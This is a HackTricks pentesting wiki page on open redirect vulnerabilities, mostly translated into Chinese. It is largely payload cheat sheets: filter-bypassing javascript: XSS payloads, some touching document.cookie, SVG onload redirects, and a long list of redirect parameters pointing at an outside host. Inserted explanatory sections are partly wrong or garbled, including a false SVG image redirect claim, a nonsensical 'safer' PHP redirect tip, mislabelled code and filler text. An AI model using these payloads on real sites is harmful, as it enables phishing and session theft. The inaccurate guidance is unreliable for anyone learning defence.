hacktricks/pentesting-web/open-redirect.md

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 推特 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

- 你在一家**网络安全公司**工作吗？你想在HackTricks中看到你的**公司广告**吗？或者你想获得**PEASS的最新版本或下载PDF格式的HackTricks**吗？请查看[**订阅计划**](https://github.com/sponsors/carlospolop)！

- 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)

- 获取[**官方PEASS和HackTricks的衣物**](https://peass.creator-spring.com)

- **加入** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或 **关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**

- **通过向[hacktricks repo](https://github.com/carlospolop/hacktricks)和[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)提交PR来分享你的黑客技巧**。

</details>


# 开放重定向

## 重定向到本地主机或任意域名

{% content-ref url="ssrf-server-side-request-forgery/url-format-bypass.md" %}
[url-format-bypass.md](ssrf-server-side-request-forgery/url-format-bypass.md)
{% endcontent-ref %}

## 开放重定向到XSS
```bash
#Basic payload, javascript code is executed after "javascript:"
javascript:alert(1)

#Bypass "javascript" word filter with CRLF
java%0d%0ascript%0d%0a:alert(0)

#Javascript with "://" (Notice that in JS "//" is a line coment, so new line is created before the payload). URL double encoding is needed
#This bypasses FILTER_VALIDATE_URL os PHP
javascript://%250Aalert(1)

#Variation of "javascript://" bypass when a query is also needed (using comments or ternary operator)
javascript://%250Aalert(1)//?1
javascript://%250A1?alert(1):0

#Others
%09Jav%09ascript:alert(document.domain)
javascript://%250Alert(document.location=document.cookie)
/%09/javascript:alert(1);
/%09/javascript:alert(1)
//%5cjavascript:alert(1);
//%5cjavascript:alert(1)
/%5cjavascript:alert(1);
/%5cjavascript:alert(1)
javascript://%0aalert(1)
<>javascript:alert(1);
//javascript:alert(1);
//javascript:alert(1)
/javascript:alert(1);
/javascript:alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
javascript:alert(1);
javascript:alert(1)
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
javascript:confirm(1)
javascript://https://whitelisted.com/?z=%0Aalert(1)
javascript:prompt(1)
jaVAscript://whitelisted.com//%0d%0aalert(1);//
javascript://whitelisted.com?%a0alert%281%29
/x:1/:///%01javascript:alert(document.cookie)/
";alert(0);//
```
# 上传svg文件的开放重定向

An open redirect vulnerability occurs when a web application allows users to redirect to external URLs without proper validation. This can be exploited by an attacker to redirect users to malicious websites.

## Exploiting Open Redirect in SVG File Uploads

1. Identify the vulnerable parameter: Look for any parameter in the URL that is used for redirection.

2. Upload an SVG file: Upload a specially crafted SVG file that contains a redirect URL in the `xlink:href` attribute of an `<image>` tag.

   ```html
   <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
     <image xlink:href="https://malicious-website.com" />
   </svg>
   ```

3. Verify the redirect: Access the uploaded SVG file and check if the redirect occurs to the specified URL.

## Mitigating Open Redirect Vulnerabilities

To prevent open redirect vulnerabilities in SVG file uploads, follow these best practices:

- Validate and sanitize user input: Ensure that any user-supplied input used for redirection is properly validated and sanitized to prevent malicious redirects.

- Whitelist allowed URLs: Maintain a whitelist of allowed URLs and validate that the redirect URL matches the whitelist before performing the redirection.

- Implement server-side checks: Perform server-side checks to validate the redirect URL and ensure it is within the same domain or a trusted domain.

By following these practices, you can mitigate the risk of open redirect vulnerabilities in SVG file uploads.
```markup
<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='http://www.example.com'"
xmlns="http://www.w3.org/2000/svg">
</svg>
</code>
```
# 常见的注入参数

When performing web application penetration testing, it is important to be aware of common injection parameters that can be exploited. These parameters are often used by attackers to inject malicious code or commands into a web application, leading to various security vulnerabilities.

以下是在进行网络应用程序渗透测试时需要注意的常见注入参数，攻击者经常利用这些参数注入恶意代码或命令到网络应用程序中，从而导致各种安全漏洞。

## 1. URL Parameters

URL parameters are commonly used to pass data between web pages. Attackers can manipulate these parameters to inject malicious code or redirect users to malicious websites. Some common URL parameters that are vulnerable to injection attacks include:

- `?redirect=`: This parameter is used to redirect users to a specific URL. Attackers can modify the value of this parameter to redirect users to a malicious website.

- `?next=`: This parameter is often used in login and authentication processes to redirect users after successful authentication. Attackers can modify the value of this parameter to redirect users to a malicious website.

- `?return_url=`: This parameter is used to redirect users back to a specific URL after completing a certain action. Attackers can modify the value of this parameter to redirect users to a malicious website.

## 2. Form Parameters

Form parameters are used to send data from a web page to a server. Attackers can manipulate these parameters to inject malicious code or perform other malicious actions. Some common form parameters that are vulnerable to injection attacks include:

- `redirect`: This parameter is often used to redirect users after submitting a form. Attackers can modify the value of this parameter to redirect users to a malicious website.

- `callback`: This parameter is used in AJAX requests to specify a callback function. Attackers can manipulate the value of this parameter to execute arbitrary code.

- `return_url`: This parameter is used to redirect users back to a specific URL after completing a certain action. Attackers can modify the value of this parameter to redirect users to a malicious website.

## 3. Cookie Parameters

Cookies are used to store user session information. Attackers can manipulate cookie parameters to perform session hijacking or other malicious actions. Some common cookie parameters that are vulnerable to injection attacks include:

- `redirect`: This parameter is often used to redirect users after logging in. Attackers can modify the value of this parameter to redirect users to a malicious website.

- `return_url`: This parameter is used to redirect users back to a specific URL after completing a certain action. Attackers can modify the value of this parameter to redirect users to a malicious website.

- `session_id`: This parameter is used to identify a user's session. Attackers can manipulate the value of this parameter to hijack a user's session.

It is important to thoroughly test and validate these injection points during a penetration test to identify and mitigate any potential vulnerabilities.
```
/{payload}
?next={payload}
?url={payload}
?target={payload}
?rurl={payload}
?dest={payload}
?destination={payload}
?redir={payload}
?redirect_uri={payload}
?redirect_url={payload}
?redirect={payload}
/redirect/{payload}
/cgi-bin/redirect.cgi?{payload}
/out/{payload}
/out?{payload}
?view={payload}
/login?to={payload}
?image_url={payload}
?go={payload}
?return={payload}
?returnTo={payload}
?return_to={payload}
?checkout_url={payload}
?continue={payload}
?return_path={payload}
success=https://c1h2e1.github.io
data=https://c1h2e1.github.io
qurl=https://c1h2e1.github.io
login=https://c1h2e1.github.io
logout=https://c1h2e1.github.io
ext=https://c1h2e1.github.io
clickurl=https://c1h2e1.github.io
goto=https://c1h2e1.github.io
rit_url=https://c1h2e1.github.io
forward_url=https://c1h2e1.github.io
@https://c1h2e1.github.io
forward=https://c1h2e1.github.io
pic=https://c1h2e1.github.io
callback_url=https://c1h2e1.github.io
jump=https://c1h2e1.github.io
jump_url=https://c1h2e1.github.io
click?u=https://c1h2e1.github.io
originUrl=https://c1h2e1.github.io
origin=https://c1h2e1.github.io
Url=https://c1h2e1.github.io
desturl=https://c1h2e1.github.io
u=https://c1h2e1.github.io
page=https://c1h2e1.github.io
u1=https://c1h2e1.github.io
action=https://c1h2e1.github.io
action_url=https://c1h2e1.github.io
Redirect=https://c1h2e1.github.io
sp_url=https://c1h2e1.github.io
service=https://c1h2e1.github.io
recurl=https://c1h2e1.github.io
j?url=https://c1h2e1.github.io
url=//https://c1h2e1.github.io
uri=https://c1h2e1.github.io
u=https://c1h2e1.github.io
allinurl:https://c1h2e1.github.io
q=https://c1h2e1.github.io
link=https://c1h2e1.github.io
src=https://c1h2e1.github.io
tc?src=https://c1h2e1.github.io
linkAddress=https://c1h2e1.github.io
location=https://c1h2e1.github.io
burl=https://c1h2e1.github.io
request=https://c1h2e1.github.io
backurl=https://c1h2e1.github.io
RedirectUrl=https://c1h2e1.github.io
Redirect=https://c1h2e1.github.io
ReturnUrl=https://c1h2e1.github.io
```
# 代码示例

### .Net
```bash
response.redirect("~/mysafe-subdomain/login.aspx")
```
### Java

Java是一种广泛使用的编程语言，常用于开发跨平台的应用程序。它具有强大的面向对象特性和丰富的类库，使得开发人员可以轻松地构建复杂的应用程序。

Java的安全性是其重要的特点之一。它提供了许多内置的安全功能，如访问控制和异常处理，以帮助开发人员编写安全的代码。

然而，Java应用程序也可能存在安全漏洞，其中之一是开放重定向漏洞。开放重定向漏洞是指攻击者可以利用应用程序中的重定向功能来将用户重定向到恶意网站或欺骗性网页。

攻击者可以利用开放重定向漏洞进行钓鱼攻击、会话劫持或其他恶意行为。为了防止这种漏洞，开发人员应该遵循安全的编码实践，如验证重定向URL的合法性、使用白名单来限制重定向目标等。

在进行渗透测试时，测试人员可以利用开放重定向漏洞来获取敏感信息或进行其他攻击。他们可以通过修改重定向URL来将用户重定向到恶意网站，或者利用已知的开放重定向漏洞来执行其他攻击。

为了保护Java应用程序免受开放重定向漏洞的威胁，开发人员应该定期审查代码，修复任何潜在的漏洞，并使用安全的编码实践来编写可靠的应用程序。此外，渗透测试人员也应该对应用程序进行测试，以发现并报告任何存在的漏洞，以便及时修复。
```bash
response.redirect("http://mysafedomain.com");
```
### PHP

#### Open Redirect

An open redirect vulnerability occurs when a web application allows users to redirect to external URLs without proper validation. This can be exploited by an attacker to redirect users to malicious websites, phishing pages, or to perform other malicious actions.

To identify open redirect vulnerabilities in PHP applications, you can follow these steps:

1. **Manual Testing**: Manually test the application by providing different values for the redirect parameter and observe if it redirects to external URLs without validation.

2. **Automated Tools**: Use automated tools like Burp Suite, OWASP ZAP, or Nmap to scan the application for open redirect vulnerabilities.

3. **Source Code Analysis**: Analyze the source code of the application to identify any insecure redirect functions or lack of input validation.

Once you have identified an open redirect vulnerability, you can exploit it by crafting a malicious URL that redirects the user to a specified location. For example:

```
http://example.com/redirect.php?url=http://malicious-website.com
```

To prevent open redirect vulnerabilities in PHP applications, you should:

- **Validate Input**: Always validate and sanitize user input before using it in a redirect function.

- **Whitelist URLs**: Maintain a whitelist of trusted URLs that the application can redirect to.

- **Encode URLs**: Encode the redirect URL to prevent attackers from injecting malicious characters.

- **Use Safe Redirect Functions**: Instead of using `header()` or `Location` headers, use safer redirect functions like `header("Location: $url", true, 302)`.

By following these best practices, you can mitigate the risk of open redirect vulnerabilities in PHP applications.
```php
<?php
/* browser redirections*/
header("Location: http://mysafedomain.com");
exit;
?>
```
# 工具

* [https://github.com/0xNanda/Oralyzer](https://github.com/0xNanda/Oralyzer)

# 资源

在 [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open Redirect](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect) 中，你可以找到模糊测试列表。\
[https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html)\
[https://github.com/cujanovic/Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads)


<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

- 你在一家**网络安全公司**工作吗？你想在HackTricks中**宣传你的公司**吗？或者你想要**获取最新版本的PEASS或下载PDF格式的HackTricks**吗？请查看[**订阅计划**](https://github.com/sponsors/carlospolop)！

- 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品——[**The PEASS Family**](https://opensea.io/collection/the-peass-family)

- 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)

- **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass)，或者**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**

- **通过向[hacktricks repo](https://github.com/carlospolop/hacktricks)和[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)提交PR来分享你的黑客技巧**。

</details>